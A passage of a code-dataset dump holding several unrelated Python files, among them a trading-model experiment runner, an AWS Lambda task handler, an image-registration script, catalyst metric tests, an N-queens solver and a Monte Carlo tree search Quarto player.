\"LSTM-CPD-21\":\n architecture = \"LSTM\"\n lstm_time_steps = 63\n changepoint_lbws = [21]\n elif experiment == \"LSTM-CPD-63\":\n architecture = \"LSTM\"\n lstm_time_steps = 63\n changepoint_lbws = [63]\n elif experiment == \"TFT\":\n architecture = \"TFT\"\n lstm_time_steps = 252\n changepoint_lbws = None\n elif experiment == \"TFT-CPD-126-21\":\n architecture = \"TFT\"\n lstm_time_steps = 252\n changepoint_lbws = [126, 21]\n elif experiment == \"TFT-SHORT\":\n architecture = \"TFT\"\n lstm_time_steps = 63\n changepoint_lbws = None\n elif experiment == \"TFT-SHORT-CPD-21\":\n architecture = \"TFT\"\n lstm_time_steps = 63\n changepoint_lbws = [21]\n elif experiment == \"TFT-SHORT-CPD-63\":\n architecture = \"TFT\"\n lstm_time_steps = 63\n changepoint_lbws = [63]\n else:\n raise BaseException(\"Invalid experiment.\")\n\n versions = range(1, 1 + num_repeats) if not TEST_MODE else [1]\n\n experiment_prefix = (\n NAME\n + (\"_TEST\" if TEST_MODE else \"\")\n + (\"\" if TRAIN_VALID_RATIO == 0.90 else f\"_split{int(TRAIN_VALID_RATIO * 100)}\")\n )\n\n cp_string = (\n \"none\"\n if not changepoint_lbws\n else reduce(lambda x, y: str(x) + str(y), changepoint_lbws)\n )\n time_string = \"time\" if TIME_FEATURES else \"notime\"\n _project_name = f\"{experiment_prefix}_{architecture.lower()}_cp{cp_string}_len{lstm_time_steps}_{time_string}_{'div' if EVALUATE_DIVERSIFIED_VAL_SHARPE else 'val'}\"\n if FORCE_OUTPUT_SHARPE_LENGTH:\n _project_name += f\"_outlen{FORCE_OUTPUT_SHARPE_LENGTH}\"\n _project_name += \"_v\"\n for v in versions:\n PROJECT_NAME = _project_name + str(v)\n\n intervals = [\n (train_start, y, y + test_window_size)\n for y in range(test_start, test_end - 1)\n ]\n\n params = MODLE_PARAMS.copy()\n params[\"total_time_steps\"] = lstm_time_steps\n params[\"architecture\"] = architecture\n params[\"evaluate_diversified_val_sharpe\"] = EVALUATE_DIVERSIFIED_VAL_SHARPE\n params[\"train_valid_ratio\"] = TRAIN_VALID_RATIO\n params[\"time_features\"] = TIME_FEATURES\n params[\"force_output_sharpe_length\"] = FORCE_OUTPUT_SHARPE_LENGTH\n\n if TEST_MODE:\n params[\"num_epochs\"] = 1\n params[\"random_search_iterations\"] = 2\n\n if changepoint_lbws:\n features_file_path = os.path.join(\n \"data\",\n 
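The insertNumbers exercise shown just above only handles values that fall strictly between two neighbours (its own comment admits the indexing is unclear), so boundary inputs such as 0 or 11 are silently dropped. A standard-library alternative that preserves the ordering for every input:

import bisect

def insert_number(arrays, value):
    # bisect.insort keeps the list sorted for any value, including the extremes.
    bisect.insort(arrays, value)
    return arrays

print(insert_number([1, 3, 4, 5, 6, 8, 10], 2))   # [1, 2, 3, 4, 5, 6, 8, 10]
print(insert_number([1, 3, 4, 5, 6, 8, 10], 11))  # 11 is appended at the end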
f\"quandl_cpd_{np.max(changepoint_lbws)}lbw.csv\",\n )\n else:\n features_file_path = os.path.join(\n \"data\",\n \"quandl_cpd_nonelbw.csv\",\n )\n\n run_all_windows(\n PROJECT_NAME,\n features_file_path,\n intervals,\n params,\n changepoint_lbws,\n ASSET_CLASS_MAPPING,\n [32, 64, 128] if lstm_time_steps == 252 else HP_MINIBATCH_SIZE,\n test_window_size,\n )\n\n\nif __name__ == \"__main__\":\n\n def get_args():\n \"\"\"Returns settings from command line.\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Run DMN experiment\")\n parser.add_argument(\n \"experiment\",\n metavar=\"c\",\n type=str,\n nargs=\"?\",\n default=\"TFT-CPD-126-21\",\n choices=[\n \"LSTM\",\n \"LSTM-CPD-21\",\n \"LSTM-CPD-63\",\n \"TFT\",\n \"TFT-CPD-126-21\",\n \"TFT-SHORT\",\n \"TFT-SHORT-CPD-21\",\n \"TFT-SHORT-CPD-63\",\n ],\n help=\"Input folder for CPD outputs.\",\n )\n parser.add_argument(\n \"train_start\",\n metavar=\"s\",\n type=int,\n nargs=\"?\",\n default=1990,\n help=\"Training start year\",\n )\n parser.add_argument(\n \"test_start\",\n metavar=\"t\",\n type=int,\n nargs=\"?\",\n default=2016,\n help=\"Training end year and test start year.\",\n )\n parser.add_argument(\n \"test_end\",\n metavar=\"e\",\n type=int,\n nargs=\"?\",\n default=2022,\n help=\"Testing end year.\",\n )\n parser.add_argument(\n \"test_window_size\",\n metavar=\"w\",\n type=int,\n nargs=\"?\",\n default=1,\n help=\"Test window length in years.\",\n )\n parser.add_argument(\n \"num_repeats\",\n metavar=\"r\",\n type=int,\n nargs=\"?\",\n default=1,\n help=\"Number of experiment repeats.\",\n )\n\n args = parser.parse_known_args()[0]\n\n return (\n args.experiment,\n args.train_start,\n args.test_start,\n args.test_end,\n args.test_window_size,\n args.num_repeats,\n )\n\n main(*get_args())\n","repo_name":"kieranjwood/trading-momentum-transformer","sub_path":"examples/run_dmn_experiment.py","file_name":"run_dmn_experiment.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","stars":327,"dataset":"github-code","pt":"37"} +{"seq_id":"41300940186","text":"import os\nimport json\n\nimport boto3\nfrom identity_check import *\nfrom response import *\nfrom error_messages import *\nfrom lambda_base_class import LambdaBaseClass\nfrom models.task_model import TaskModel\n\n\ntask_table = TaskModel(os.environ[\"TableDataFlowTaskName\"], None)\n\n\nclass GetCompressDownloadClass(LambdaBaseClass):\n def __init__(self) -> None:\n super().__init__()\n\n @LambdaBaseClass.parse_body\n def parser(self, body):\n self.logger.debug(f\"body in main_parser: {body}\")\n self.id_token = body[\"id_token\"]\n self.task_id = body[\"task_id\"]\n\n def handle(self, event, context):\n ### parse body\n self.parser(event)\n\n identity_id = self.get_identity(self.id_token)\n response = task_table.table.get_item(\n Key={\n \"identity_id\": identity_id,\n \"task_id\": self.task_id\n },\n )\n\n task = response.get(\"Item\", None)\n # pop out identity_id if needed\n if task is None:\n raise Exception(MESS_TASK_NOT_EXIST.format(self.task_id))\n\n task.pop(\"identity_id\", None)\n print(\"Task return: \", task)\n return generate_response(\n message=\"OK\",\n status_code=HTTPStatus.OK,\n data=task,\n )\n\n\n@error_response\ndef lambda_handler(event, context):\n return GetCompressDownloadClass().handle(event, 
context)\n","repo_name":"daita-technologies/backend","sub_path":"daita-app/core-service/functions/handlers/dataflow/get_compress_download_task/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74269946346","text":"import os\nfrom combine_transforms import get_save_combined_tranform\nimport fnmatch\nimport sys\nimport SimpleITK as sitk\n\n\ndef get_tform_files(slice_dir):\n tform_dic = {}\n affine_tf_file = ''\n bspline_def_file = ''\n reg_dir = os.path.join(slice_dir,'reg')\n for root, dir, files in os.walk(reg_dir):\n order = -1\n if fnmatch.fnmatch(root, '*/*Step_Auto*'): # it's inside /RES*\n direc = os.path.split(root)[1]\n order = int(direc[0]) # folder name should always be something like '1stStep:Auto'\n for fn in fnmatch.filter(files, '*0GenericAffine.mat'): #there should be only one\n affine_tf_file = os.path.join(root,fn)\n for fn in fnmatch.filter(files, '*deformationField.nii'): #there should be only one\n bspline_def_file = os.path.join(root,fn)\n if order > -1:\n tform_dic[order] = (affine_tf_file, bspline_def_file)\n\n return tform_dic\n\n\ndef apply_registrations(slice_dir,mov_file,ref_file,reg_file):\n\n print('Processing {}'.format(slice_dir))\n\n tform_dic = get_tform_files(slice_dir)\n key_list = tform_dic.keys()\n key_list.sort()\n nTf = len(key_list)\n\n print('Found {} transform pair(s)'.format(nTf))\n\n # create ordered list of transformation pairs\n tform_arr = []\n for k in key_list:\n tform_pair = tform_dic[k]\n tform_arr.append(tform_pair)\n\n # compute and save combined transform\n combined_tform_file = os.path.join(slice_dir,'reg/combined_transforms.h5')\n composite_tf = get_save_combined_tranform(tform_arr,combined_tform_file)\n\n # apply transforms\n mov_img = sitk.ReadImage(mov_file, sitk.sitkFloat64)\n ref_img = sitk.ReadImage(ref_file, sitk.sitkFloat64)\n reg_img = sitk.Resample(mov_img, ref_img, composite_tf, sitk.sitkLinear, 0.0, mov_img.GetPixelIDValue())\n sitk.WriteImage(reg_img, reg_file)\n print('Saved registered image.')\n print('Ref image: {}'.format(ref_file))\n print('Mov image: {}'.format(mov_file))\n print('Reg image: {}'.format(reg_file))\n\ndef main():\n if len(sys.argv) != 5:\n print('Usage: apply_combined_registrations.py ')\n exit()\n\n slice_dir = sys.argv[1]\n mov_file = sys.argv[2] #histology or heatmap\n ref_file = sys.argv[3] #blockface\n reg_file = sys.argv[4] #output: registered heatmap/histology\n\n # slice_dir = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164'\n # mov_file = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164/reg/AT100_164_res10.nii'\n # ref_file = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164/reg/AV13-002_0164.png.nii'\n # reg_file = '/home/maryana/storage/Posdoc/AVID/AV23/AT100/full_res/AT100_164/reg/reg.nii'\n\n apply_registrations(slice_dir,mov_file,ref_file,reg_file)\n\nif __name__ == '__main__':\n main()","repo_name":"grinberglab/high-res-3D-tau","sub_path":"registration/apply_combined_registrations.py","file_name":"apply_combined_registrations.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35130728316","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.bms.bms_client import BmsClient\nfrom googlecloudsdk.calliope import 
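get_save_combined_tranform is a local helper, but the idea apply_registrations above relies on can be sketched with plain SimpleITK (version 2.x, where CompositeTransform is exposed): stack each affine/deformation pair into one transform and resample once. All file names below are hypothetical, and the sketch assumes the per-step outputs have been converted to formats sitk.ReadTransform/ReadImage accept.

import SimpleITK as sitk

# Hypothetical inputs; the real pipeline discovers these per registration step.
affine = sitk.ReadTransform("step1_affine.tfm")
field = sitk.ReadImage("step1_deformationField.nii", sitk.sitkVectorFloat64)
warp = sitk.DisplacementFieldTransform(field)

composite = sitk.CompositeTransform([affine, warp])
sitk.WriteTransform(composite, "combined_transforms.h5")

moving = sitk.ReadImage("moving.nii", sitk.sitkFloat64)
reference = sitk.ReadImage("reference.nii", sitk.sitkFloat64)
registered = sitk.Resample(moving, reference, composite,
                           sitk.sitkLinear, 0.0, moving.GetPixelIDValue())
sitk.WriteImage(registered, "registered.nii")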
base\nfrom googlecloudsdk.command_lib.bms import exceptions\nfrom googlecloudsdk.command_lib.bms import flags\nfrom googlecloudsdk.core import log\n\nDETAILED_HELP = {\n 'DESCRIPTION':\n \"\"\"\n Update a Bare Metal Solution volume.\n\n This call returns immediately, but the update operation may take\n several minutes to complete. To check if the operation is complete,\n use the `describe` command for the volume.\n \"\"\",\n 'EXAMPLES':\n \"\"\"\n To update a volume called ``my-volume'' in region ``us-central1'' with\n a new snapshot schedule policy ``my-policy'' and snapshot auto delete\n behavior ``oldest-first'', run:\n\n $ {command} my-volume --region=us-central1 --snapshot-schedule-policy=my-policy --snapshot-auto-delete=oldest-first\n \"\"\",\n}\n\n\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA, base.ReleaseTrack.GA)\nclass Update(base.UpdateCommand):\n \"\"\"Update a Bare Metal Solution volume.\"\"\"\n\n @staticmethod\n def Args(parser):\n \"\"\"Register flags for this command.\"\"\"\n flags.AddVolumeSnapshotAutoDeleteBehaviorArgToParser(parser)\n flags.AddVolumeArgToParser(parser, positional=True)\n\n ssp_group = parser.add_mutually_exclusive_group()\n flags.AddSnapshotSchedulePolicyArgToParser(parser, required=False,\n group=ssp_group)\n ssp_group.add_argument('--remove-snapshot-schedule-policy',\n action='store_true',\n help='Remove any existing snapshot schedule policy.')\n\n def Run(self, args):\n volume = args.CONCEPTS.volume.Parse()\n policy = args.CONCEPTS.snapshot_schedule_policy.Parse()\n client = BmsClient()\n\n if (not policy and not args.snapshot_auto_delete\n and not args.remove_snapshot_schedule_policy):\n raise exceptions.NoConfigurationChangeError(\n 'No configuration change was requested. Did you mean to include the '\n 'flags `--snapshot-schedule-policy`, '\n '`--remove-snapshot-schedule-policy`, or `--snapshot-auto-delete`?')\n\n op_ref = client.UpdateVolume(\n volume_resource=volume,\n snapshot_schedule_policy_resource=policy,\n remove_snapshot_schedule_policy=args.remove_snapshot_schedule_policy,\n snapshot_auto_delete=flags\n .VOLUME_SNAPSHOT_AUTO_DELETE_BEHAVIOR_MAPPER.GetEnumForChoice(\n args.snapshot_auto_delete))\n\n log.status.Print('Update request issued for: [{}]\\nThis may take several '\n 'minutes to complete.'.format(volume.Name()))\n\n return op_ref\n\n\nUpdate.detailed_help = DETAILED_HELP\n","repo_name":"boostcampaitech2/final-project-level3-cv-15","sub_path":"serving/google-cloud-sdk/lib/surface/bms/volumes/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26646546326","text":"from typing import Dict, Iterable, Union\nfrom collections import OrderedDict\nfrom tempfile import TemporaryDirectory\n\nimport pytest\nimport torch\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom catalyst import data, dl\nfrom catalyst.callbacks.metric import BatchMetricCallback, LoaderMetricCallback\nfrom catalyst.contrib import datasets, nn\nfrom catalyst.metrics import AccuracyMetric, CMCMetric\n\nNUM_CLASSES = 4\nNUM_FEATURES = 100\nNUM_SAMPLES = 200\n\n\nclass DummyModel(nn.Module):\n \"\"\"Dummy model\"\"\"\n\n def __init__(self, num_features: int, num_classes: int) -> None:\n super().__init__()\n self.model = nn.Sequential(\n nn.Flatten(), nn.Linear(in_features=num_features, out_features=num_classes),\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward\n\n 
Args:\n x: inputs\n\n Returns:\n model's output\n \"\"\"\n return self.model(x)\n\n\n@pytest.mark.parametrize(\n \"input_key,target_key,keys\",\n (\n (\n \"inputs_test\",\n \"logits_test\",\n {\"inputs_test\": \"inputs_test\", \"logits_test\": \"logits_test\"},\n ),\n (\n [\"test_1\", \"test_2\", \"test_3\"],\n [\"test_4\"],\n {\"test_1\": \"test_1\", \"test_2\": \"test_2\", \"test_3\": \"test_3\", \"test_4\": \"test_4\"},\n ),\n (\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\"},\n [\"test_5\"],\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\", \"test_5\": \"test_5\"},\n ),\n (\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\"},\n {\"test_5\": \"test_6\", \"test_7\": \"test_8\"},\n {\"test_1\": \"test_2\", \"test_3\": \"test_4\", \"test_5\": \"test_6\", \"test_7\": \"test_8\"},\n ),\n ),\n)\ndef test_format_keys(\n input_key: Union[str, Iterable[str], Dict[str, str]],\n target_key: Union[str, Iterable[str], Dict[str, str]],\n keys: Dict[str, str],\n) -> None:\n \"\"\"Check MetricCallback converts keys correctly\"\"\"\n accuracy = AccuracyMetric()\n callback = BatchMetricCallback(metric=accuracy, input_key=input_key, target_key=target_key)\n assert callback._keys == keys\n\n\ndef test_classification_pipeline():\n \"\"\"\n Test if classification pipeline can run and compute metrics.\n In this test we check that BatchMetricCallback works with\n AccuracyMetric (ICallbackBatchMetric).\n \"\"\"\n x = torch.rand(NUM_SAMPLES, NUM_FEATURES)\n y = (torch.rand(NUM_SAMPLES) * NUM_CLASSES).long()\n dataset = TensorDataset(x, y)\n loader = DataLoader(dataset, batch_size=64, num_workers=1)\n\n model = DummyModel(num_features=NUM_FEATURES, num_classes=NUM_CLASSES)\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters())\n\n runner = dl.SupervisedRunner(input_key=\"features\", output_key=\"logits\", target_key=\"targets\")\n with TemporaryDirectory() as logdir:\n runner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n loaders=OrderedDict({\"train\": loader, \"valid\": loader}),\n logdir=logdir,\n num_epochs=3,\n verbose=False,\n valid_loader=\"valid\",\n valid_metric=\"loss\",\n minimize_valid_metric=True,\n callbacks=OrderedDict(\n {\n \"classification\": dl.BatchMetricCallback(\n metric=AccuracyMetric(num_classes=NUM_CLASSES),\n input_key=\"logits\",\n target_key=\"targets\",\n ),\n }\n ),\n )\n assert \"accuracy\" in runner.batch_metrics\n assert \"accuracy\" in runner.loader_metrics\n\n\nclass CustomRunner(dl.SupervisedRunner):\n \"\"\"Custom runner for metric learning pipeline\"\"\"\n\n def handle_batch(self, batch: Dict[str, torch.Tensor]) -> None:\n \"\"\"\n Handle batch for train and valid loaders\n\n Args:\n batch: batch to process\n \"\"\"\n if self.is_train_loader:\n images, targets = batch[\"features\"].float(), batch[\"targets\"].long()\n features = self.model(images)\n self.batch = {\n \"embeddings\": features,\n \"targets\": targets,\n \"images\": images,\n }\n else:\n images, targets, is_query = (\n batch[\"features\"].float(),\n batch[\"targets\"].long(),\n batch[\"is_query\"].bool(),\n )\n features = self.model(images)\n self.batch = {\n \"embeddings\": features,\n \"targets\": targets,\n \"is_query\": is_query,\n }\n\n\ndef test_metric_learning_pipeline():\n \"\"\"\n Test if classification pipeline can run and compute metrics.\n In this test we check that LoaderMetricCallback works with\n CMCMetric (ICallbackLoaderMetric).\n \"\"\"\n with TemporaryDirectory() as tmp_dir:\n dataset_train = datasets.MnistMLDataset(root=tmp_dir, 
download=True)\n sampler = data.BalanceBatchSampler(labels=dataset_train.get_labels(), p=5, k=10)\n train_loader = DataLoader(\n dataset=dataset_train, sampler=sampler, batch_size=sampler.batch_size,\n )\n dataset_val = datasets.MnistQGDataset(root=tmp_dir, transform=None, gallery_fraq=0.2)\n val_loader = DataLoader(dataset=dataset_val, batch_size=1024)\n\n model = DummyModel(num_features=28 * 28, num_classes=NUM_CLASSES)\n optimizer = Adam(model.parameters(), lr=0.001)\n\n sampler_inbatch = data.HardTripletsSampler(norm_required=False)\n criterion = nn.TripletMarginLossWithSampler(margin=0.5, sampler_inbatch=sampler_inbatch)\n\n callbacks = OrderedDict(\n {\n \"cmc\": dl.ControlFlowCallback(\n LoaderMetricCallback(\n CMCMetric(\n topk_args=[1],\n embeddings_key=\"embeddings\",\n labels_key=\"targets\",\n is_query_key=\"is_query\",\n ),\n input_key=[\"embeddings\", \"is_query\"],\n target_key=[\"targets\"],\n ),\n loaders=\"valid\",\n ),\n \"control\": dl.PeriodicLoaderCallback(\n valid_loader_key=\"valid\", valid_metric_key=\"cmc\", valid=2\n ),\n }\n )\n\n runner = CustomRunner(input_key=\"features\", output_key=\"embeddings\")\n runner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n callbacks=callbacks,\n loaders=OrderedDict({\"train\": train_loader, \"valid\": val_loader}),\n verbose=False,\n valid_loader=\"valid\",\n num_epochs=4,\n )\n assert \"cmc01\" in runner.loader_metrics\n","repo_name":"prashanta99/catalyst","sub_path":"catalyst/callbacks/tests/test_metric.py","file_name":"test_metric.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"4954727957","text":"import typing\nfrom typing import Type, Any, Optional, TypeVar, Dict, List\n\nT = TypeVar(\"T\")\n\n\ndef implicit_cast(value: Any, target_type: Type[T]) -> T:\n # allow implicit int -> float cast\n if isinstance(value, int) and target_type == float:\n value = float(value)\n\n if not isinstance(value, target_type):\n raise TypeError(f\"{type(value)} not equal to {target_type}\")\n\n return value\n\n\ndef is_same_type(type1: Type[Any], type2: Type[Any]) -> bool:\n if type1 in (int, float) and type2 in (int, float):\n return True\n\n return type1 == type2\n\n\ndef _get_generic_args_internal(typing_obj: Any, expected_class: Any, args_map: Optional[Dict[Any, Any]] = None) -> \\\n Optional[List[Any]]:\n if args_map is None:\n args_map = {}\n\n obj = typing.get_origin(typing_obj) or typing_obj\n if obj is None:\n return None\n\n class_args = [args_map.get(x, x)\n for x in typing.get_args(typing_obj)] # get args and replace with passed mapping if exists\n\n if obj == expected_class:\n return class_args\n\n __orig_bases__ = getattr(obj, \"__orig_bases__\", None)\n if __orig_bases__ is None:\n return None\n\n generic_classes = [x for x in __orig_bases__ if typing.get_origin(x) == typing.Generic]\n if len(generic_classes) == 0:\n other_base_classes = obj.__orig_bases__\n args_map = None\n else:\n generic_cls = generic_classes[0]\n other_base_classes = [x for x in __orig_bases__ if typing.get_origin(x) != typing.Generic]\n generic_args = typing.get_args(generic_cls)\n assert len(class_args) == len(generic_args)\n\n args_map = {ga: ca for ca, ga in zip(class_args, generic_args)}\n\n for base_cls in other_base_classes:\n v = _get_generic_args_internal(base_cls, expected_class, args_map)\n if v is not None:\n return v\n\n return None\n\n\ndef get_generic_args_for_obj(obj: Any, expected_class: Any) -> List[Any]:\n typing_cls = 
getattr(obj, \"__orig_class__\", obj)\n res = _get_generic_args_internal(typing_cls, expected_class, {})\n if res is None:\n raise TypeError(\"no generic type\")\n return res\n\n\n__all__ = [\n \"implicit_cast\",\n \"is_same_type\",\n \"get_generic_args_for_obj\",\n]\n","repo_name":"KrystianD/pycontrolflow","sub_path":"pycontrolflow/type_utils.py","file_name":"type_utils.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5590576712","text":"from pathlib import Path\nimport traceback\nimport numpy as np\nimport random\nfrom tqdm import tqdm\n\nfrom google_images_download import google_images_download\n\nfrom util.constants import *\n\ndef download_images(n_imgs=15):\n '''\n Use google images api to download images and save to save_path\n '''\n # constants\n max_retries = 3\n # set up downloader\n ggl_img_resp = google_images_download.googleimagesdownload()\n doodle_dir = Path(FULL_DOODLE_PATH)\n assert(doodle_dir.is_dir())\n # make output directories if they don't exist\n out_path = Path(IMG_PATH)\n if not out_path.is_dir():\n out_path.mkdir(parents=True)\n # iterate over doodles we have and populate directories of images\n for f_doodle in tqdm(doodle_dir.iterdir()):\n doodle_class = f_doodle.stem\n img_class_path = out_path/doodle_class\n # check if images downloaded already -- if so, continue to next class\n downloaded_imgs = lambda: [i for i in img_class_path.rglob('*')]\n if len(downloaded_imgs()):\n continue\n # download images\n try:\n n_retries = 0\n while n_retries < max_retries and len(downloaded_imgs()) <= 0:\n ggl_img_resp.download({\n 'keywords': classname_to_keyword(doodle_class),\n 'limit': n_imgs,\n 'type': 'photo',\n 'output_directory': str(img_class_path),\n 'no_directory': True,\n 'silent_mode': True\n })\n n_retries += 1\n except:\n print('failed to download ' + doodle_class)\n traceback.print_exc()\n\n### OBSOLETE-- doing different split now ######\ndef test_train_split(classes=None, outfile='test_train_split.npy', split=40):\n '''\n randomly selects `split` fraction of classes to be reserved for test => outputs list of test \n classes to `outfile` (placed inside preprocessing/data directory)\n '''\n if Path(outfile).is_file():\n return np.load(outfile, allow_pickle=True).item()\n else:\n if split < 1:\n split *= N_IMG_CLASSES\n split = int(split)\n if classes==None:\n classes = [i.stem for i in Path(IMG_PATH).glob('*') if i != Path(PROCESSED_IMG_PATH)]\n random.shuffle(classes)\n classes_split = {\n 'test': classes[:split],\n 'train': classes[split:]\n }\n np.save(outfile, classes_split)\n return classes_split\n\ndef classname_to_keyword(name):\n '''\n replace underscores with spaces\n (files should have no spaces in name, but we want to search with normal words)\n '''\n return name.replace(\"_\", \" \")\n\nif __name__=='__main__':\n download_images()\n test_train_split()","repo_name":"16hchung/doodle_img_comparison","sub_path":"preprocessing/images_data.py","file_name":"images_data.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26055257494","text":"# N 퀸 # B_9663\n# 백트래킹 문제\n\n\"\"\"\ns[i][j]\n대각선: i+j가 같은 애들끼리 짝지으면 대각선 도출 가능\n반대 대각선: i-j가 같은 애들끼리\n\"\"\"\ndef check(row, col): # 퀸을 놓을 수 있는지 체크 / 못놓으면 버림->백트래킹\n if check_col[col]:\n return False\n if check_dig[row+col]:\n return False\n if check_dig2[row-col+n-1]:\n return False\n return True\n\ndef 
calc(row):\n if row == n:\n return 1\n ans = 0\n for col in range(n):\n if check(row,col):\n check_dig[row+col] = True # 대각선\n check_dig2[row-col+n-1] = True #반대 대각선\n check_col[col] = True # 열 체크\n a[row][col] = True # 행 체크\n ans += calc(row+1)\n check_dig[row+col] = False\n check_dig2[row-col+n-1] = False\n check_col[col] = False\n a[row][col] = False\n return ans\n\nn = int(input())\na = [[False]*n for _ in range(n)]\ncheck_col = [False] * n\ncheck_dig = [False] * (2*n-1)\ncheck_dig2 = [False] * (2*n-1)\nprint(calc(0))\n\n","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[Bruteforce]/연습/[Brute_Force]N-queen.py","file_name":"[Brute_Force]N-queen.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19660960648","text":"from django.urls import path\r\nfrom .import views\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('addcontact/', views.add_contact, name='addcontact'),\r\n path('profile/', views.contact_profile, name='profile'),\r\n path('editcontact/', views.edit_contact, name='editcontact'),\r\n path('deletecontact/', views.delete_contact, name='deletecontact'),\r\n]\r\n","repo_name":"PranavAchrekar/ContactListApp","sub_path":"contact/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7604711680","text":"import time \nfrom quarto import Quarto, Player\nfrom copy import deepcopy\nfrom math import sqrt, log\nimport numpy as np\nimport logging\nfrom operator import and_ \nfrom functools import reduce , cache \nimport matplotlib.pyplot as plt\nimport random\nC = sqrt(2)\nclass Node: \n def __init__(self,move,parent, phase : bool, player : bool):\n self.move = move \n self.parent = parent \n self.N = 0 \n self.Q = 0 \n self.children = dict()\n self.outcome = -1\n self.phase = phase\n self.player = player \n self.FLAG = False \n \n def add_children(self, children :list)-> None: \n for child in children : \n self.children[child.move] = child\n \n def value(self) -> float : \n if self.N == 0 :\n return 1000000\n else : \n return self.Q /self.N + C * sqrt(log(self.parent.N/self.N))\n \n \n \nclass MCTS_MINMAX(Player):\n def __init__(self,quarto):\n self.root_state = quarto\n self.root = Node(None ,None,None ,True )\n\n self.node_count = 0 \n self.num_rollouts = 0 \n self.forbidden_pieces = list()\n \n ## SEARCHING THROUGH THE TREE AND SELECT NODE FOR ROLL-OUT PHASE \n def select_node(self,state : Quarto,phase : bool , player : bool) -> tuple:\n node = self.root\n CurrState = deepcopy(state)\n\n while len(node.children) != 0:\n children = node.children.values()\n\n max_value = max(children, key=lambda n: n.value()).value()\n max_nodes = [n for n in children if n.value() == max_value]\n\n node = random.choice(max_nodes)\n player = node.player\n phase = node.phase\n if type(node.move) is tuple:\n CurrState.place(*node.move)\n else : \n CurrState.select(node.move)\n if node.N == 0:\n return node, CurrState, not phase\n player , phase =self.get_player_and_phase(player , phase )\n if self.expand(node, CurrState,phase,player):\n node = random.choice(list(node.children.values()))\n if type(node.move) is tuple:\n CurrState.place(*node.move)\n else: \n CurrState.select(node.move)\n return node, CurrState, not phase\n else : \n return node , CurrState , phase \n '''SINCE THE PHASE AND PLAYER ARE REPRESENTED BY BOOLEANS\n THIS METHODS IS 
AN OPERATOR THAT GIVES US THE RIGHT PLAYING AND PHASE ORDER\n THE PHASE IS ALWAYS INVERTED\n HOWEVER SINCE A PLAYER COULD DO PLACING AND SELECTION ONE AFTER AN OTHER\n PLAYER(t) = PLAYER(t-1) XOR PHASE(t-1)'''\n\n @staticmethod\n def get_player_and_phase(player , phase)-> tuple:\n return player ^ phase ,not phase \n '''METHODS THAT FINDS THE ALL AVAILABLE POSITIONS ON THE BOARD'''\n @staticmethod\n def get_available_positions(state: Quarto)->list: \n moves = list()\n for i, row in enumerate(state.get_board_status()): \n for j,element in enumerate(row): \n if element == -1 : \n moves.append((i,j)) \n return moves \n def scores(self): \n max_value = max(self.root.children.values(), key=lambda n: n.N).N\n max_nodes = [n for n in self.root.children.values() if n.N == max_value]\n best_child = random.choice(max_nodes)\n return best_child.move\n \n ## EXPANSION PHASE\n def expand(self, parent: Node, state: Quarto,phase : bool , player : bool) -> bool:\n \n if state.check_winner() !=-1 or state.check_finished() :\n return False\n if (not phase) and (parent.move is not None) : \n\n if self.heuristic_2(state,parent.move) : \n parent.FLAG = True \n return False \n \n if phase :\n children = [Node(move, parent,phase, player) for move in self.get_available_pieces(state)]\n else : \n board = state.get_board_status()\n children = [Node((i,j), parent,phase, player) for i,j in zip(np.where(board == -1)[0],np.where(board == -1)[1]) ]\n\n parent.add_children(children)\n\n return True\n \n ## BACK PROPAGATION PHASE \n def back_propagate(self, node: Node, outcome: int) -> None:\n \n if outcome == 1 :\n winner = node.player\n elif outcome == -1 : \n winner = not node.player \n else: \n winner = None\n while node is not None:\n node.N += 1\n if node.player == winner : \n node.Q += 1\n node = node.parent\n \n \n '''SEARCH METHOD ( NODE SELECTION +EXPANSION + ROLLOUT + BACKPORPAGATION )'''\n def search(self,state: Quarto, phase : bool,player : True ): \n start_time = time.process_time()\n num_rollouts = 0\n while time.process_time() - start_time < self.time_limit:\n node, new_state , new_phase = self.select_node(state,phase,player) \n outcome = self.alpha_beta(new_state , -np.inf , np.inf ,True , new_phase,0,node.move) \n self.back_propagate(node, outcome)\n num_rollouts += 1\n run_time = time.process_time() - start_time\n self.run_time = run_time\n self.num_rollouts = num_rollouts\n \n 